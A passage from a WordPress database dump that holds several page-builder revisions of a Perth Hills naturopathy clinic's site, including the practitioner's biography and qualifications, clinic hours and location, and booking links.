_builder_version=\"4.9.4\" background_color=\"RGBA(0,0,0,0)\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||-5px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"][/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat,Playfair Display\"]<p><span style=\"font-family: Montserrat; font-weight: normal;\">Mel has a keen interest in women’s health, gut health, metabolic dysfunction, autoimmunity and mental health. She keeps up to date with the latest research and findings on all things naturopathy, blending traditional knowledge with evidence-based medicine to achieve positive health outcomes. When she’s not consulting or creating, you’ll most likely find her brewing a cuppa, chasing after her three children or wandering through the forest. </span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"> </span></p>\n<p><span style=\"font-size: large;\"><strong><span style=\"font-family: \'Playfair Display\';\">Qualifications: </span></strong></span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\">Bachelor of Health Science (Naturopathy) </span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\">Bachelor of Science (Biological Science) </span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"> </span></p>\n<p><span style=\"font-family: \'Playfair Display\'; font-weight: normal; font-size: large;\"><strong>Professional memberships</strong>: </span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\">Australian Natural Therapist’s Association (ANTA) - Full member</span></p>\n<ul></ul>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" hover_enabled=\"0\" locked=\"off\" sticky_enabled=\"0\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#000000\" border_style_all=\"none\" border_width_left=\"5px\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\">Location</span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span style=\"font-family: Montserrat;\">Online Zoom consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verde-health.au2.cliniko.com/bookings?business_id=430041870630918322&practitioner_id=430041868173056552\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#c7d3c0\" button_border_width=\"2px\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" hover_enabled=\"0\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; \">Clinic Hours</span></h3>\n<p><span style=\"font-family: Montserrat; \">Tues/Wed/Thurs: 9am - 5pm</span><br /><span style=\"font-family: Montserrat; \">Alternate Saturdays: 9am-1pm</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','About','','inherit','closed','closed','','27-revision-v1','','','2021-05-27 21:19:06','2021-05-27 13:19:06','',27,'https://verdenaturopathy.com.au/?p=250',0,'revision','',0),(216,1,'2021-05-27 13:25:30','2021-05-27 05:25:30','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Meet Mel.</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">Mel is a mother, tea lover, avid foodie and degree-qualified naturopath. She resides amongst the trees in the Perth Hills. </span></p>\n<p><span style=\"font-family: Montserrat;\">She has always held a passion for holistic health and wellbeing since a young age. Chronic hormonal imbalances and gut issues led her to her first naturopathy appointment where she gained a newfound respect for the profession after achieving success in returning to health. </span></p>\n<p><span style=\"font-family: Montserrat;\">Mel is passionate about educating and empowering clients to achieve their health goals, working to restore balance between their mental, physical and emotional health. She has witnessed firsthand the healing power of herbs and nutrients, incorporating them into her own life as well as her client’s. Mel also runs Verde Botanicals, offering small-batch, handmade herbal remedies to keep her creative juices flowing. </span></p>\n<p> </p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#ccd4c8\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\"][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/IMG_3973-scaled.jpg\" title_text=\"IMG_3973\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"2_5,3_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#CCD4C8\" custom_padding=\"|20px||20px|false|false\"][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/IMG_3912-scaled.jpg\" title_text=\"IMG_3912\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"RGBA(0,0,0,0)\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||-5px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"][/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat,Playfair Display\"]<p><span style=\"font-family: Montserrat; font-weight: normal;\">Mel has a keen interest in women’s health, gut health, metabolic dysfunction, autoimmunity and mental health. She keeps up to date with the latest research and findings on all things naturopathy, blending traditional knowledge with evidence-based medicine to achieve positive health outcomes. When she’s not consulting or creating, you’ll most likely find her brewing a cuppa, chasing after her three children or wandering through the forest. </span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"> </span></p>\n<p><span style=\"font-size: large;\"><strong><span style=\"font-family: \'Playfair Display\';\">Qualifications: </span></strong></span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\">Bachelor of Health Science (Naturopathy) </span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\">Bachelor of Science (Biological Science) </span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"> </span></p>\n<p><span style=\"font-family: \'Playfair Display\'; font-weight: normal; font-size: large;\"><strong>Professional memberships</strong>: </span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\">Australian Natural Therapist’s Association (ANTA) - Full member</span></p>\n<ul></ul>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"#ccd4c8\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#000000\" border_style_all=\"none\" border_width_left=\"5px\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\">Location</span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span style=\"font-family: Montserrat;\">Online Zoom consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verde-health.au2.cliniko.com/bookings?business_id=430041870630918322&practitioner_id=430041868173056552\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#c7d3c0\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" hover_enabled=\"0\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; \">Clinic Hours</span></h3>\n<p><span style=\"font-family: Montserrat; \">Tues/Wed/Thurs: 9am - 5pm</span><br /><span style=\"font-family: Montserrat; \">Alternate Saturdays: 9am-1pm</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','About','','inherit','closed','closed','','27-revision-v1','','','2021-05-27 13:25:30','2021-05-27 05:25:30','',27,'https://verdenaturopathy.com.au/?p=216',0,'revision','',0),(257,1,'2021-05-27 21:28:05','2021-05-27 13:28:05','[et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"rgba(255,255,255,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" saved_tabs=\"all\" locked=\"off\" template_type=\"section\"][et_pb_row _builder_version=\"4.9.4\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||265px||\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#ccd4c8\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"><strong>Location</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span style=\"font-family: Montserrat;\">Online Zoom consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"][/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#CCD4C8\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_icon_color=\"#000000\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" hover_enabled=\"0\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\"><strong>Clinic Hours</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed/Thurs: 9-5pm</span><br /><span style=\"font-family: Montserrat;\">Alternate Saturdays: 9-1pm</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','clinic info','','inherit','closed','closed','','188-revision-v1','','','2021-05-27 21:28:05','2021-05-27 13:28:05','',188,'https://verdenaturopathy.com.au/?p=257',0,'revision','',0),(218,1,'2021-05-27 13:27:01','2021-05-27 05:27:01','[et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"rgba(255,255,255,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" saved_tabs=\"all\" locked=\"off\" template_type=\"section\"][et_pb_row _builder_version=\"4.9.4\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||265px||\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#ccd4c8\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"><strong>Location</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span style=\"font-family: Montserrat;\">Online Zoom consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"][/et_pb_text][et_pb_button button_url=\"https://verde-health.au2.cliniko.com/bookings?business_id=430041870630918322&practitioner_id=430041868173056552\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#CCD4C8\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_icon_color=\"#000000\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" hover_enabled=\"0\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\"><strong>Clinic Hours</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed/Thurs: 9-5pm</span><br /><span style=\"font-family: Montserrat;\">Alternate Saturdays: 9-1pm</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','clinic info','','inherit','closed','closed','','188-revision-v1','','','2021-05-27 13:27:01','2021-05-27 05:27:01','',188,'https://verdenaturopathy.com.au/?p=218',0,'revision','',0),(266,1,'2021-05-27 21:33:34','2021-05-27 13:33:34','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_enable_color=\"off\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" min_height=\"224px\" custom_margin=\"||60px|||\" custom_padding=\"||0px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22colorStart%22%93}\" colorStart=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\"][et_pb_row _builder_version=\"4.9.4\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"22px\" text_line_height=\"1.4em\" header_font=\"ZCOOL XiaoWei||||||||\" header_text_color=\"#a9804a\" header_font_size=\"80px\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" text_font_size_tablet=\"18px\" text_font_size_phone=\"16px\" text_font_size_last_edited=\"on|tablet\" text_line_height_tablet=\"\" text_line_height_phone=\"1.8em\" text_line_height_last_edited=\"on|phone\" header_font_size_tablet=\"48px\" header_font_size_phone=\"30px\" header_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h1><span style=\"color: #000000; font-family: \'Playfair Display\';\">Get in touch</span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact\" _builder_version=\"4.9.4\" background_color=\"rgba(0,0,0,0)\" min_height=\"560px\" custom_padding=\"0px|||||\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.9.4\" background_enable_color=\"off\" min_height=\"665px\" custom_margin=\"0px||||false|false\" custom_padding=\"0px||||false|false\"][et_pb_column type=\"1_2\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" background_enable_image=\"off\" transform_translate=\"0px|-60px\" 